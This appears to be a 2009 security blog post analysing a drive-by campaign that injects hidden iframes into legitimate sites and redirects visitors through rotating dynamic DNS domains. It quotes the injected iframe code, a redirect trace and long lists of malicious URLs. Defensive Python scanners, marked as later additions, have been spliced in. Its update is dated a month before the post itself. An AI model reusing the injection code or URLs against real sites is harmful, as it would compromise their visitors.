Tuesday, 13 October 2009

Drive-by campaign using dynamic DNS domains

Since Monday a new drive-by campaign has been making the rounds which is using dynamic DNS domains of DynDNS and No-IP to spread malware.
The drive-by campaign consists of three different stages illustrated below:
Figure: overview of the three stages of the dynamic DNS drive-by campaign
*** First stage ***
The first stage is the same in all drive-by campaigns: the cybercriminals inject malicious code into legitimate websites (mostly using stolen FTP credentials, see “An Iframer for Dummies”). In this case the malicious code is an iframe pointing to a malicious domain for the second stage. The iframe can look like this:
<iframe src="http://aakinci.kicks-ass.net:8080/ts/in.cgi?open3" width=248 height=0 style="visibility: hidden"></iframe>
<iframe src="http://aaaauto.servebbs.net:8080/ts/in.cgi?open2" width=625 height=0 style="visibility: hidden"></iframe>
As you can see above, the cybercriminals are using dynamic DNS domain names in the iframes for this purpose.
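As a defender, the quickest win from the first stage is to scan the HTML of your own sites for exactly this pattern: an iframe that is invisible (zero height or `visibility: hidden`) and whose `src` points at a dynamic DNS host, often on a non-standard port. The following scanner is an added example and not part of the original post; the suffix list is assembled from the dynamic DNS hosts quoted in this post plus the well-known `dyndns.org` and `no-ip.org`, and the sample page is constructed around the two iframes shown above.

```python
"""Flag hidden iframes that point at dynamic DNS hosts in an HTML document."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Dynamic DNS suffixes (DynDNS / No-IP) seen in this campaign's iframes and
# redirector list, plus two well-known provider suffixes. Illustrative only;
# extend it from your own DNS logs.
DYNDNS_SUFFIXES = (
    "kicks-ass.net", "servebbs.net", "sytes.net", "homeftp.net",
    "dynalias.org", "blogdns.com", "dyndns.biz", "is-a-geek.com",
    "dnsalias.org", "selfip.com", "myvnc.com", "dontexist.net",
    "selfip.net", "servehttp.com", "servebeer.com", "bounceme.net",
    "thruhere.net", "myftp.org", "serveirc.com", "servegame.com",
    "gotdns.org", "homedns.org", "dyndns.org", "no-ip.org",
)


def is_dynamic_dns(host: str) -> bool:
    """True if host is a dynamic DNS provider name or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES)


def is_hidden(attrs: dict) -> bool:
    """Heuristics for an iframe the visitor is not meant to see."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (
        attrs.get("height", "").strip() in ("0", "0px")
        or attrs.get("width", "").strip() in ("0", "0px")
        or "visibility:hidden" in style
        or "display:none" in style
    )


class IframeFinder(HTMLParser):
    """Collects (src, reasons) for every iframe that trips a heuristic."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        src = a.get("src", "")
        parts = urlsplit(src)
        reasons = []
        if is_hidden(a):
            reasons.append("hidden")
        if is_dynamic_dns(parts.hostname or ""):
            reasons.append("dynamic-dns host")
        if parts.port not in (None, 80, 443):
            reasons.append(f"non-standard port {parts.port}")
        if reasons:
            self.findings.append((src, reasons))


def find_suspicious_iframes(html: str):
    """Return a list of (src, reasons) for iframes worth a closer look."""
    finder = IframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: the two injected iframes quoted in the post plus a
# benign, visible embed on a normal host and port.
SAMPLE_PAGE = """<html><body>
<p>Welcome to our site.</p>
<iframe src="https://www.example.com/widget" width=300 height=200></iframe>
<iframe src="http://aakinci.kicks-ass.net:8080/ts/in.cgi?open3" width=248 height=0 style="visibility: hidden"></iframe>
<iframe src="http://aaaauto.servebbs.net:8080/ts/in.cgi?open2" width=625 height=0 style="visibility: hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE):
        print(f"{src}  <- {', '.join(reasons)}")
```

Run it over a crawl of your own web root after every deployment, or as a post-upload hook on the FTP server the post names as the usual entry point; a hit with all three reasons is almost never legitimate content.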
*** Second stage ***
The second stage is the URL that an iframe from the first stage points to. The URL carries one of the following parameters, which is passed to in.cgi, for example:
/ts/in.cgi?open1
/ts/in.cgi?open2
/ts/in.cgi?open3
/ts/in.cgi?open4
/ts/in.cgi?open5
/ts/in.cgi?open6
/ts/in.cgi?open7
If a user visits an infected website carrying such a malicious iframe, the in.cgi script tries to set three cookies for the domain traffcount.cn (222.73.37.203 – CHINANET-SH) and sends an HTTP 302 (redirect) back to the victim's browser.
Here’s an example of such a request:
GET http://senmu.homeftp.net:8080/ts/in.cgi?open4
Resolving senmu.homeftp.net… 79.143.129.13
Connecting to senmu.homeftp.net|79.143.129.13|:8080… connected.
HTTP request sent, awaiting response… 302 Found
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn
Location: http://magalieroy.sytes.net:8080/index.php [following]
…with the following HTML content:
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://magalieroy.sytes.net:8080/index.php'">
</head>
<body>
document moved <a href="http://magalieroy.sytes.net:8080/index.php">here</a>
</body>
</html>
…and the following cookies (one per line):
senmu.homeftp.net:8080 FALSE / FALSE [number] SL_default_0000 _1_
senmu.homeftp.net:8080 FALSE / FALSE [number] TSUSER open4
senmu.homeftp.net:8080 FALSE / FALSE [number] SL_open4_0000
So far I’ve seen the following dynamic DNS domains acting as “redirector” in the second stage:
Redirecting URLs (second stage)
http://aaburke.dynalias.org/ts/in.cgi?open
http://aandrioli.servebbs.net:8080/ts/in.cgi?open
http://a2stu.blogdns.com:8080/ts/in.cgi?open
http://aakinci.kicks-ass.net:8080/ts/in.cgi?open
http://a77mo.dyndns.biz:8080/ts/in.cgi?open
http://aaronpoon.is-a-geek.com:8080/ts/in.cgi?open
http://senmu.homeftp.net:8080/ts/in.cgi?open
http://a151.scrapping.cc:8080/ts/in.cgi?open
http://styleorient.dnsalias.org:8080/ts/in.cgi?open
http://aaa689.selfip.com:8080/ts/in.cgi?open
http://aaaauto.servebbs.net:8080/ts/in.cgi?open
http://timofey78.myvnc.com:8080/ts/in.cgi?open
http://a555eo.dontexist.net/ts/in.cgi?open
http://sunshinecoasttours.selfip.net/ts/in.cgi?open
http://ahmet.servehttp.com/ts/in.cgi?open
http://aabatyshkin.dontexist.net/ts/in.cgi?open
http://ilana223.servebeer.com/ts/in.cgi?open
http://maloos.selfip.com/ts/in.cgi?open
Each of these redirection domains seems to select a target URL for the third-stage redirection. For this purpose every redirection URL has a pool of ten target URLs to choose from (some kind of domain set), and this pool is changed every hour.
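Both observations above, the `in.cgi?openN` request answered with a 302 to an `:8080/index.php` target and the hourly rotating pool of targets per redirector, can be recovered from ordinary web proxy logs without touching the attacker's infrastructure. The script below is an added example, not part of the original post: it reads constructed log lines in a simplified `timestamp client method url status location` format (not the format of any real proxy), reconstructs second-to-third-stage redirects, and groups the observed targets per redirector and per hour so the pool rotation becomes visible. Hostnames in the sample are taken from the lists in this post.

```python
"""Reconstruct the campaign's redirect chain from web proxy logs."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log lines in a simplified format (not a real proxy's):
#   <timestamp> <client> <method> <url> <status> <location-or-dash>
SAMPLE_LOG = """\
2009-10-13T09:14:02Z 10.0.0.5 GET http://www.example.com/news.html 200 -
2009-10-13T09:14:03Z 10.0.0.5 GET http://senmu.homeftp.net:8080/ts/in.cgi?open4 302 http://magalieroy.sytes.net:8080/index.php
2009-10-13T09:14:03Z 10.0.0.5 GET http://magalieroy.sytes.net:8080/index.php 200 -
2009-10-13T09:40:51Z 10.0.0.9 GET http://senmu.homeftp.net:8080/ts/in.cgi?open2 302 http://bartgreer.serveirc.com:8080/index.php
2009-10-13T10:02:11Z 10.0.0.7 GET http://senmu.homeftp.net:8080/ts/in.cgi?open4 302 http://inezh.gotdns.org:8080/index.php
2009-10-13T10:15:30Z 10.0.0.7 GET http://www.example.com/ts/in.cgi?open4 404 -
2009-10-13T10:44:09Z 10.0.0.5 GET http://aakinci.kicks-ass.net:8080/ts/in.cgi?open3 302 http://ndoy70.sytes.net:8080/index.php
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")
# The redirector is always /ts/in.cgi with an openN parameter, as quoted above.
SECOND_STAGE_PARAM = re.compile(r"^open\d$")


def is_second_stage(url: str) -> bool:
    """Request to the campaign's redirector script."""
    p = urlsplit(url)
    return p.path == "/ts/in.cgi" and SECOND_STAGE_PARAM.match(p.query or "") is not None


def is_third_stage(url: str) -> bool:
    """Target URL as observed in this campaign: /index.php on port 8080."""
    p = urlsplit(url)
    return p.port == 8080 and p.path == "/index.php"


def analyze(log_text: str):
    """Return (chains, pools).

    chains: one dict per observed second->third stage redirect.
    pools:  {(redirector_host, 'YYYY-MM-DDTHH'): sorted target hosts}, which
            exposes the per-hour target set behind each redirector.
    """
    chains = []
    pools = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        ts, client, _method, url, status, location = m.groups()
        if status != "302" or not is_second_stage(url) or not is_third_stage(location):
            continue
        redirector = urlsplit(url).hostname
        target = urlsplit(location).hostname
        hour = ts[:13]  # YYYY-MM-DDTHH
        chains.append({
            "time": ts,
            "client": client,
            "redirector": redirector,
            "param": urlsplit(url).query,
            "target": target,
        })
        pools[(redirector, hour)].add(target)
    return chains, {key: sorted(hosts) for key, hosts in pools.items()}


if __name__ == "__main__":
    chains, pools = analyze(SAMPLE_LOG)
    for c in chains:
        print(f"{c['time']} {c['client']} {c['redirector']} ({c['param']}) -> {c['target']}")
    for (redirector, hour), targets in sorted(pools.items()):
        print(f"{redirector} @ {hour}: {len(targets)} target(s): {', '.join(targets)}")
```

The `chains` list tells you which internal clients were exposed and therefore need a look (even while the third stage serves blank pages, those hosts visited an injected site); the `pools` map is what you feed into a blocklist, and because the pool rotates hourly, the feed has to be regenerated at least that often or, simpler, the whole redirector set has to be blocked at the proxy.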
*** Third stage ***
As mentioned before, the dynamic DNS domains used by the third stage change frequently (using different domain sets and HTTP 302). One would expect the target domains to contain malicious code that exploits vulnerable web browsers and browser plugins used by the visitors. BUT actually they serve neither content nor exploits – just blank pages:
Target URLs (third stage)
http://alfredhaloci.servehttp.com:8080/index.php
http://elajjouri1980.thruhere.net:8080/index.php
http://svfokin.servehalflife.com:8080/index.php
http://hafidiab.bounceme.net:8080/index.php
http://lccsondl.servegame.com:8080/index.php
http://enotxl.boldlygoingnowhere.org:8080/index.php
http://bartgreer.serveirc.com:8080/index.php
http://andreasavarese.sytes.net:8080/index.php
http://jedrekmich.selfip.info:8080/index.php
http://andreamaica.myftp.org:8080/index.php
http://halpertgabor.serveirc.com:8080/index.php
http://andreamaica.myftp.org:8080/index.php
http://ndoy70.sytes.net:8080/index.php
http://bartgreer.serveirc.com:8080/index.php
http://abdcheggouri.dnsalias.net:8080/index.php
http://abaqui.servebbs.com:8080/index.php
http://inezh.gotdns.org:8080/index.php
http://tanyamironenko.serveblog.net:8080/index.php
http://stefan.servehalflife.com:8080/index.php
http://arkadiz.blogdns.com:8080/index.php
http://assistem.myftp.org:8080/index.php
http://crni.servegame.com:8080/index.php
http://petrenkoma.servegame.com:8080/index.php
http://meboubaroud.homedns.org:8080/index.php
http://ladoga25.bounceme.net:8080/index.php
http://magalieroy.sytes.net:8080/index.php
http://anekon.dnsdojo.net:8080/index.php
A full list of the malicious domains used by this drive-by campaign in the third stage can be found here: www.abuse.ch/downloads/dyndns_driveby.txt (currently I have already captured more than 1'500 unique domains associated with this drive-by campaign). The list is updated continuously by a script.
Conclusion
The strange thing is that the malicious domains currently don’t serve any kind of exploits/malware. So the question is why the cybercriminals are injecting malicious iframes into thousands of legitimate websites while the drive-by infection doesn’t work. While several explanations exist, such as geoIP dependencies, the following one sounds most reasonable: they want to inject the malicious iframes into as many sites as possible. As soon as they have infected enough websites, they will put exploits onto the dynamic DNS domains which are currently just hosting a blank page. The benefit could be that AV vendors are not able to get hold of any exploits or malware before the cybercriminals “activate” the attack. Though the security industry might track the threat, it would be unable to react to it as long as the attack has not been launched (don’t forget the domain flux the domains are using).
Dynamic DNS domains are used more and more for this kind of attack. Maybe it’s time for us to reconsider the firewall policies of corporate networks concerning access to them?
UPDATE 2009-09-14
It seems that this drive-by campaign spreads a variant of the Bredolab trojan.